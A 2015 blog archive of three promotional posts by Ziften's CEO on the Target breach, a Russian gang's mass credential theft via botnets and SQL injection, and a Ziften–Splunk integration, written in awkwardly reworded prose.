Monthly Archives: April 2015

Your Organization’s Cyber Security Defenses Need To Be Strong. Learn Lessons From The Target Attack – Charles Leaver

By Charles Leaver CEO Ziften


After Target was breached it took a number of months for the company to recuperate and be given a clean bill of health.

Constant Recovery Effort And Reports Of Financial Loss

It was a significant story when Target suffered from its data breach. Like all major news releases it faded into the background as far as being covered nationally, but as far as the company is concerned it was still a major top priority. The store lowered its earnings forecasts for 2014 once again, which implies that the business had undervalued the impact of the malicious attack that they were exposed to, according CNN Money.

The reduction in revenues was actually significant and the business ended up declaring 62% less profits. In addition to this they had to pay $111 million as a direct outcome of the breach in the second financial quarter and all of this amounts to a business that was once robust now looking a shadow of its former self because of a cyber attack.

As the fallout continued, the scale of the cyber attack started to emerge. Information for around 110 million individuals was compromised, and stolen charge card data was experienced by 40 million of those individuals. As news ventured out about the breach, the business made some significant modifications that included the execution of more stringent cyber security measures and changing of the system admin. Long standing CEO, Gregg Steinhafel, also resigned. But it is not deemed enough to mitigate the effect of the attack. The stakeholders of Target are soaking up the unfavorable impacts of the attack as much as the business itself according to Brian Sozzi of Belus Capital.

In an e-mail to CNN Money Sozzi said “Target just dropped an epic complete year profits warning onto the heads of its remaining shareholders.” “Target has actually offered investors ABSOLUTELY NO reason to be encouraged that a global turnaround is covertly emerging.”

Target Supplies A Lesson For All Organizations About Improved Pre-emptive Measures

No matter how proactive a company is to a cyber attack, there is no assurance that the recovery time will be quicker. The bottom line is that a data breach is bad news for any company no matter how you call it or attempt to fix it. Preventative procedures are the very best way forward and you need to take steps to ensure an attack does not happen to your organization in the first place. Using endpoint threat detection systems can have a substantial role in maintaining strong defenses for any company that opts to implement it.


Charles Leaver – With Russian Hackers Stealing Huge Amount Of Information You Must Defend Your Organization With Continuous Endpoint Monitoring

Charles Leaver Ziften CEO

It is thought that the greatest recognized cyber attack in the history of data breaches has actually been discovered by an American cyber security business. It is thought by the company that a group of cyber bad guys from Russia that they have actually been examining for numerous months is accountable for stealing passwords in the billions and other sensitive individual data. It is declared that the Russian group stole 4.5 billion credentials, although a lot were duplicated, and the end result was 1.2 billion unique data profiles being stolen. The group took the information from 420,000 sites of different sizes, from large brand name websites to smaller mom and pop stores.

The New York Times stated that the cyber wrongdoers comprised of about 12 people. Starting out with small scale spamming methods in 2011 they gained the majority of the data by buying stolen databases.

In an interview with PCMag, the creator of the company that found the breach, Alex Holden, said “the gang started by just buying the databases that were readily available online.” The group used to acquire at fire sales and were described as “bottom feeders”. As time progressed they started the purchase of higher quality databases. It’s sort of like graduating from stealing bicycles to stealing pricey automobiles.”

A Progression From Spamming To Utilizing Botnets

The cyber criminal team started to alter their habits. Botnets were used by the group to gather the stolen credentials on a much bigger scale. Through making use of the botnets the group were able to automate the process of determining websites that were susceptible and this allowed them to work 24/7. Anytime that a contaminated user would go to a site, the bot would inspect to see if the vulnerability would could go through an SQL injection automatically. Utilizing these injections, which is a frequently used hacking tool, the database of the website would be forced to reveal its contents through the entering of a simple query. The botnets would flag those sites that were susceptible and the hackers returned later on to extract the info from the website. Using the bot was the ultimate failure of the group as they were discovered by the security company utilizing it.

It is thought by the security company that the billions of pieces of data that were taken were not stolen at the same time, and that the majority of the records were most likely purchased from other cyber wrongdoers. According to the Times, very few of the records that were taken have actually been sold online, rather the hacking group have decided to use the info for the sending out of spam messages on social media for other groups so that they can earn money. Different cyber security specialists are asserting that the magnitude of this breach signifies a trend of cyber wrongdoers stockpiling big quantities of personal profiles in time and saving them for use later on, according to the Wall Street Journal.

Security analyst at the research study firm Gartner, Avivah Litan, stated “companies that rely on user names and passwords have to develop a sense of urgency about altering this.” “Till they do, wrongdoers will simply keep stockpiling individuals’s credentials.”

Cyber attacks and breaches on this scale underline the need for organizations to protect themselves with the most recent cyber security defenses. Systems that utilize endpoint threat detection and response will help organizations to produce a clearer picture of the dangers facing their networks and receive information that is actionable on how best to resist attacks. Today, when big data breaches are going to happen more and more, making use of continuous endpoint visibility is crucial for the security of a company. If the network of the organization is constantly monitored, hazards can be identified in real time, and this will minimize the damage that a data breach can inflict on the reputation and bottom line of a company.


Why The Ziften And Splunk Active Response Framework Is A Major Step Forward In Cyber Security – Charles Leaver

Written By Charles Leaver CEO Ziften



We were the sponsor in Las Vegas for a terrific Splunk.conf2014 program, we returned energized and raring to go to push on even further forward with our solution here at Ziften. A talk that was of particular interest was by the Security Solutions Architect for Splunk, Jose Hernandez. “Using Splunk to Automatically Mitigate Risks” was the name of his talk. If you wish to see his slides and a recording of the talk then please go to

The use of Splunk to assist with mitigation, or as I like to describe it as “Active Response” is a great idea. Having all your intelligence data streaming into Splunk is very effective, and it can be endpoint data, outside threat feeds etc, then you will be able to act on this data truly finishes the loop. At Ziften we have our effective continuous monitoring on the endpoint service, and being married to Splunk is something that we are truly extremely proud of. It is a really strong move in the right direction to have real time information analysis paired with the capability to react and take action against events.

Ziften have developed a mitigation action which uses the offered Active Response code. There is a demo video included in this post below. Here we were able to create a mitigation action within our Ziften App for Splunk as proof of concept. After the action is produced, results within Splunk ES (Enterprise Security) can be observed and tracked. This really is a major addition and now users will have the ability to monitor and track mitigations within Splunk ES, which provides you with the major advantage of being able to complete the loop and establish a history of your actions.

That Splunk is driving such an initiative delights us, this is likely to develop and we are committed to continuously support it and make further development with it. It is really exciting at the moment in the Endpoint Detection and Response area and the Active Response Framework built into Splunk being included will definitely promote a high degree of interest in my opinion.

For any concerns regarding the Ziften App for Splunk, please send out an email to